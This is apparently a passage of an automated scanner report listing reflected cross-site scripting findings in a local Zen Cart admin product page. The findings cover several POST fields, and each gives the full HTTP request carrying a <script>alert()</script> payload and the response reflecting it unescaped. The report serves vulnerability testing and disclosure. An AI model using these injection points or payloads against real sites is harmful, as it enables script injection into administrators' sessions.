Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------244472214220682
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[2]"

<script>alert(14405309.56787)</script>
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------244472214220682
Content-Disposition: form-data; name="products_model"

testval
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------244472214220682
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------244472214220682
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------244472214220682
Content-Disposition: form-data; name="image_delete"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="overwrite"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------244472214220682
Content-Disposition: form-data; name="products_weight"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="search"

test
-----------------------------244472214220682--



HTTP Response 
----Truncated due to large size ---

pes</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5"><script>alert(14405309.56787)</script>        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=


Finding 3.23:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_description[1]
Injection value: <script>alert(14405309.56887)</script>
Detection value: <script>alert(14405309.56887)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------244472214220682
Content-Length: 5027

-----------------------------244472214220682
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="x"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="y"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="master_category"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------244472214220682
Content-Disposition: form-data; name="products_status"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------244472214220682
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------244472214220682
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[1]"

<script>alert(14405309.56887)</script>
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------244472214220682
Content-Disposition: form-data; name="products_model"

testval
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------244472214220682
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------244472214220682
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------244472214220682
Content-Disposition: form-data; name="image_delete"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="overwrite"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------244472214220682
Content-Disposition: form-data; name="products_weight"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="search"

test
-----------------------------244472214220682--



HTTP Response
----Truncated due to large size ---
 
" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5"><script>alert(14405309.56887)</script>        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=update_product&page=1" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smal



Finding 3.24:  Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection.

Injected item: POST: img_dir
Injection value: >"><script>alert(14405309.57257)</script>
Detection value: alert(14405309.57257)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------244472214220682
Content-Length: 5030

-----------------------------244472214220682
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="x"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="y"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="master_category"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------244472214220682
Content-Disposition: form-data; name="products_status"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------244472214220682
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------244472214220682
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------244472214220682
Content-Disposition: form-data; name="products_model"

testval
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------244472214220682
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------244472214220682
Content-Disposition: form-data; name="img_dir"

>"><script>alert(14405309.57257)</script>
-----------------------------244472214220682
Content-Disposition: form-data; name="image_delete"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="overwrite"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------244472214220682
Content-Disposition: form-data; name="products_weight"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="search"

test
-----------------------------244472214220682--



HTTP Response
----Truncated due to large size ---
 
Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/>"><script>alert(14405309.57257)</script>25" border="0" alt=">"><script>alert(14405309.57257)</script>25" title=" >"><script>alert(14405309.57257)</script>25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspaci



Finding 3.25:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_image_manual
Injection value: >"><script>alert(14405309.57377)</script>
Detection value: alert(14405309.57377)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------244472214220682
Content-Length: 5032

-----------------------------244472214220682
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="x"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="y"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="master_category"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------244472214220682
Content-Disposition: form-data; name="products_status"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------244472214220682
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------244472214220682
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------244472214220682
Content-Disposition: form-data; name="products_model"

testval
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------244472214220682
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------244472214220682
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------244472214220682
Content-Disposition: form-data; name="image_delete"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="overwrite"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image_manual"

>"><script>alert(14405309.57377)</script>
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------244472214220682
Content-Disposition: form-data; name="products_weight"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="search"

test
-----------------------------244472214220682--



HTTP Response
----Truncated due to large size ---
 
ger</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/>"><script>alert(14405309.57377)</script>" border="0" alt="3ds/>"><script>alert(14405309.57377)</script>" title=" 3ds/>"><script>alert(14405309.57377)</script> " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspa



Finding 3.26:  Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection.

Injected item: POST: products_url[2]
Injection value: >"><script>alert(14405309.57567)</script>
Detection value: alert(14405309.57567)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------244472214220682
Content-Length: 5014

-----------------------------244472214220682
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="x"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="y"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="master_category"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------244472214220682
Content-Disposition: form-data; name="products_status"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------244472214220682
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------244472214220682
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------244472214220682
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------244472214220682
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------244472214220682
Content-Disposition: form-data; name="products_model"

testval
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------244472214220682
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------244472214220682
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------244472214220682
Content-Disposition: form-data; name="image_delete"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="overwrite"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[2]"

>"><script>alert(14405309.57567)</script>
-----------------------------244472214220682
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------244472214220682
Content-Disposition: form-data; name="products_weight"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="search"

test
-----------------------------244472214220682--



HTTP Response
----Truncated due to large size ---
 
h="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://>"><script>alert(14405309.57567)</script>" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      


Finding 3.27:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_url[1]
Injection value: >"><script>alert(14405309.57587)</script>
Detection value: alert(14405309.57587)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=1&action=new_product_preview&page=1&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=1&pID=1&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------244472214220682
Content-Length: 5014

-----------------------------244472214220682
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:42:30
-----------------------------244472214220682
Content-Disposition: form-data; name="x"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="y"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="master_category"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------244472214220682
Content-Disposition: form-data; name="products_status"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------244472214220682
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------244472214220682
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------244472214220682
